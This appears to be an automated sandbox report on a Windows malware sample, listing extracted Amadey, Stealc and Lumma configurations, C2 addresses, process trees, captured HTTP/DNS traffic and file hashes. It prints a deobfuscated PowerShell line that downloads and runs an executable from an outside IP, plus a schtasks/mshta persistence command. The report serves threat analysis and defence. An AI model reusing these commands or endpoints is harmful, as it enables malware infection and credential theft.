Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
30/03/2025, 14:54 UTC
General
-
Target
2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
fbd874278e3584ab6be6a8c49bd7ba9d
-
SHA1
2a83fce3a5f6da55d0cb7353e5a98aaac2c7fdc2
-
SHA256
c8e1a3b7374bb21b906a034c52c5fd9350fa87e822956e3f8ad37bfdb5d9cb86
-
SHA512
d7e66c87b6e871ccfe844f051ef9a0289849602fc759ba3b251ebf891000a1db282d9a7f2d3c9c328da9ed99fc85a593fe3933aa76cd7e0e8c98394d9868d1eb
-
SSDEEP
24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:7TvC/MTQYxsWR7a0J
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
1
$d = $env:temp + "NFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper
http://176.113.115.7/mine/random.exe
Extracted
Family
amadey
Version
5.21
Botnet
092155
C2
http://176.113.115.6
Attributes
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
rc4.plain
1
006700e5a2ab05704bbb0c589b88924d
Extracted
Family
stealc
Botnet
trump
C2
http://45.93.20.28
Attributes
-
url_path
/85a1cacf11314eb8.php
Extracted
Family
lumma
C2
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file 5 IoCs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 10 IoCs
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 21 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 04oVgma8dA2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\d6E1qBu5v.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 04oVgma8dA2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\d6E1qBu5v.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\d6E1qBu5v.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\TempNFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE"C:\Users\Admin\AppData\Local\TempNFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10382080101\fe8615daed.exe"C:\Users\Admin\AppData\Local\Temp\10382080101\fe8615daed.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10382090101\b86b3bb65e.exe"C:\Users\Admin\AppData\Local\Temp\10382090101\b86b3bb65e.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10382100101\3167ba9e67.exe"C:\Users\Admin\AppData\Local\Temp\10382100101\3167ba9e67.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10382100101\3167ba9e67.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10382110101\a62d92c846.exe"C:\Users\Admin\AppData\Local\Temp\10382110101\a62d92c846.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10382110101\a62d92c846.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\10382120101\54f615f6d8.exe"C:\Users\Admin\AppData\Local\Temp\10382120101\54f615f6d8.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1572 -s 647⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe"6⤵
- Executes dropped EXE
-
-
-
-
-
Network
-
GEThttp://176.113.115.7/mine/random.exeRemote address:176.113.115.7:80RequestGET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:54:20 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 30 Mar 2025 13:53:01 GMT
ETag: "1cd400-6318f9f35f3af"
Accept-Ranges: bytes
Content-Length: 1889280
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:54:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:54:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
GEThttp://176.113.115.7/files/teamex_support/random.exeRemote address:176.113.115.7:80RequestGET /files/teamex_support/random.exe HTTP/1.1
Host: 176.113.115.7
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:54:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 30 Mar 2025 14:26:43 GMT
ETag: "1d6800-6319017b64d6c"
Accept-Ranges: bytes
Content-Length: 1927168
Content-Type: application/x-msdos-program
-
GEThttp://176.113.115.7/numas/random.exeRemote address:176.113.115.7:80RequestGET /numas/random.exe HTTP/1.1
Host: 176.113.115.7
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:55:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 15:21:30 GMT
ETag: "78005-6317cbdc87280"
Accept-Ranges: bytes
Content-Length: 491525
Content-Type: application/x-msdos-program
-
GEThttp://176.113.115.7/files/unique2/random.exeRemote address:176.113.115.7:80RequestGET /files/unique2/random.exe HTTP/1.1
Host: 176.113.115.7
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 30 Mar 2025 14:07:30 GMT
ETag: "476600-6318fd2fc0612"
Accept-Ranges: bytes
Content-Length: 4679168
Content-Type: application/x-msdos-program
-
GEThttp://176.113.115.7/files/martin2/random.exeRemote address:176.113.115.7:80RequestGET /files/martin2/random.exe HTTP/1.1
Host: 176.113.115.7
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 30 Mar 2025 14:31:54 GMT
ETag: "453000-631902a44e6e7"
Accept-Ranges: bytes
Content-Length: 4534272
Content-Type: application/x-msdos-program
-
GEThttp://176.113.115.7/files/fate/random.exeRemote address:176.113.115.7:80RequestGET /files/fate/random.exe HTTP/1.1
Host: 176.113.115.7
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 25 Mar 2025 18:10:04 GMT
ETag: "119c00-6312ea1425700"
Accept-Ranges: bytes
Content-Length: 1154048
Content-Type: application/x-msdos-program
-
GEThttp://176.113.115.7/files/5766827736/kO2IdCz.exeRemote address:176.113.115.7:80RequestGET /files/5766827736/kO2IdCz.exe HTTP/1.1
Host: 176.113.115.7
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:27 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 30 Mar 2025 07:46:40 GMT
ETag: "27a00-6318a8107ed06"
Accept-Ranges: bytes
Content-Length: 162304
Content-Type: application/x-msdos-program
-
DNSesccapewz.runRemote address:8.8.8.8:53Requestesccapewz.runIN AResponse -
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:55:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:56:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:56:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:56:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://176.113.115.6/Ni9kiput/index.phpRemote address:176.113.115.6:80RequestPOST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Mar 2025 14:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
GEThttp://45.93.20.28/Remote address:45.93.20.28:80RequestGET / HTTP/1.1
Host: 45.93.20.28
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:55:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
POSThttp://45.93.20.28/85a1cacf11314eb8.phpRemote address:45.93.20.28:80RequestPOST /85a1cacf11314eb8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
Host: 45.93.20.28
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:55:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
DNStravewlio.shopRemote address:8.8.8.8:53Requesttravewlio.shopIN AResponse
-
DNStouvrlane.betRemote address:8.8.8.8:53Requesttouvrlane.betIN AResponse
-
DNSsighbtseeing.shopRemote address:8.8.8.8:53Requestsighbtseeing.shopIN AResponse
-
DNSadvennture.topRemote address:8.8.8.8:53Requestadvennture.topIN AResponseadvennture.topIN A104.21.25.9advennture.topIN A172.67.221.138
-
POSThttps://advennture.top/GKsiioRemote address:104.21.25.9:443RequestPOST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 65
Host: advennture.top
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JrUntX6irpcWswkxGisGSLCLthO8%2BI8rVbWTi4jtaEA1ZUMHDPaXaKNMGC1zd7V9UP%2FV9vkrSLSjEf5qs57jmYfMIdVT%2FUmjbOCLCEa2gxhD6Gs0Uh%2BVEFTszTFGMy8HzA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9288739edd80beb3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=30737&min_rtt=22555&rtt_var=20776&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=646&delivery_rate=149707&cwnd=252&unsent_bytes=0&cid=12cb7cf1be73cc25&ts=264&x=0"
-
POSThttps://advennture.top/GKsiioRemote address:104.21.25.9:443RequestPOST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GYM7CrM8pvIOnrdz9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1479
Host: advennture.top
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QO0ho%2B1sCfwmJ1%2BtjbvaAKAXAt%2FL2fPqpI1RtGcmAOZamAC%2B1Wzd2IuZRvbr%2FH2N4PRLcvjahOXMuhbOe9qCTJYa9mpQqLITZVdMooX%2B2fHYs%2Bs5Px22gwxNeHbnmydfLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 928873a08ec9beb3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=29713&min_rtt=22499&rtt_var=17630&sent=10&recv=11&lost=0&retrans=0&sent_bytes=3805&recv_bytes=2464&delivery_rate=149707&cwnd=254&unsent_bytes=0&cid=12cb7cf1be73cc25&ts=468&x=0"
-
POSThttps://advennture.top/GKsiioRemote address:104.21.25.9:443RequestPOST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=nIllhEGAv3YE9K4nQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1102
Host: advennture.top
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 928873a20a78ef40-LHR
alt-svc: h3=":443"; ma=86400
-
POSThttps://advennture.top/GKsiioRemote address:104.21.25.9:443RequestPOST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 103
Host: advennture.top
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aZ4%2BhowkZPF7OzYGyCekM2Iyt8DW71TsUzs%2F9h6WkjUjrsfBqlua5aa4spXBdvNun0C%2B4twM12PqFXfSLFcBnB6Gdmdr1fwPMkWaajLVSK094Sd%2FKiuH1bCJe1HCym2Vng%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 928873a34de37750-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=25058&min_rtt=22871&rtt_var=6600&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=678&delivery_rate=146217&cwnd=250&unsent_bytes=0&cid=97b89bdd8878c980&ts=216&x=0"
-
GEThttp://185.156.73.98/success?substr=mixthree&s=three&sub=noneRemote address:185.156.73.98:80RequestGET /success?substr=mixthree&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:19 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttp://185.156.73.98/infoRemote address:185.156.73.98:80RequestGET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:27 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
GEThttp://185.156.73.98/updateRemote address:185.156.73.98:80RequestGET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:27 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
GEThttp://185.156.73.98/serviceRemote address:185.156.73.98:80RequestGET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 30 Mar 2025 14:56:27 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
176.113.115.7:80http://176.113.115.7/mine/random.exehttp
HTTP Request
GET http://176.113.115.7/mine/random.exeHTTP Response
200 -
176.113.115.6:80http://176.113.115.6/Ni9kiput/index.phphttp
HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200 -
176.113.115.7:80http://176.113.115.7/files/5766827736/kO2IdCz.exehttp
HTTP Request
GET http://176.113.115.7/files/teamex_support/random.exeHTTP Response
200HTTP Request
GET http://176.113.115.7/numas/random.exeHTTP Response
200HTTP Request
GET http://176.113.115.7/files/unique2/random.exeHTTP Response
200HTTP Request
GET http://176.113.115.7/files/martin2/random.exeHTTP Response
200HTTP Request
GET http://176.113.115.7/files/fate/random.exeHTTP Response
200HTTP Request
GET http://176.113.115.7/files/5766827736/kO2IdCz.exeHTTP Response
200 -
176.113.115.6:80http://176.113.115.6/Ni9kiput/index.phphttp
HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200HTTP Request
POST http://176.113.115.6/Ni9kiput/index.phpHTTP Response
200 -
45.93.20.28:80http://45.93.20.28/85a1cacf11314eb8.phphttp
HTTP Request
GET http://45.93.20.28/HTTP Response
200HTTP Request
POST http://45.93.20.28/85a1cacf11314eb8.phpHTTP Response
200 -
104.21.25.9:443https://advennture.top/GKsiiotls, http
HTTP Request
POST https://advennture.top/GKsiioHTTP Response
200HTTP Request
POST https://advennture.top/GKsiioHTTP Response
200 -
104.21.25.9:443https://advennture.top/GKsiiotls, http
HTTP Request
POST https://advennture.top/GKsiioHTTP Response
200 -
104.21.25.9:443https://advennture.top/GKsiiotls, http
HTTP Request
POST https://advennture.top/GKsiioHTTP Response
200 -
185.156.73.98:80http://185.156.73.98/success?substr=mixthree&s=three&sub=nonehttp
HTTP Request
GET http://185.156.73.98/success?substr=mixthree&s=three&sub=noneHTTP Response
200 -
185.156.73.98:80http://185.156.73.98/servicehttp
HTTP Request
GET http://185.156.73.98/infoHTTP Response
200HTTP Request
GET http://185.156.73.98/updateHTTP Response
200HTTP Request
GET http://185.156.73.98/serviceHTTP Response
200
-
8.8.8.8:53esccapewz.rundns
DNS Request
esccapewz.run
-
8.8.8.8:53travewlio.shopdns
DNS Request
travewlio.shop
-
8.8.8.8:53touvrlane.betdns
DNS Request
touvrlane.bet
-
8.8.8.8:53sighbtseeing.shopdns
DNS Request
sighbtseeing.shop
-
8.8.8.8:53advennture.topdns
DNS Request
advennture.top
DNS Response
104.21.25.9172.67.221.138
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD54ddc9ba72fb2711009901e35a972c1dc
SHA1f6128698893491270623699e45846c5f9213172b
SHA256ef4ab6a762e0aa39c706494a5c0ddcdeb101ce52f19b9ca025a8536d44a64857
SHA51247e8cbe341b83f3704fa87d95ab96302a0bd58a27e60c99847a4c4873fc3fe2d87663a36ba0c9f8a40e09daf85292c43e3340b42af0455910a30bbc0f0ee8cd7
-
Filesize
480KB
MD51c601dcb633a5a1ad3d903a746cf7e2e
SHA16d10ea6cbedab7320c3e1f806d65c9b869105c11
SHA256960670b325ad49c1bf269c9816f2c254fa5371f96b3ad7371c5150c49591a3c7
SHA5124c692251958acc9ed91170cd327644886d965802778558f0dd7894943cbb3d8dfc990f1ffc2549782503f72a97718469e37dee495adc89e8fef02601e2325cf7
-
Filesize
4.5MB
MD5289e4ddcf0bf64afdb644fb575a8b1a5
SHA16213ebcbc71ccea7e065abd6c83ed51e90c28288
SHA2567d254530f4e89834307333d738f71afe7a0dec12953f80a4fbfb4e03675910d5
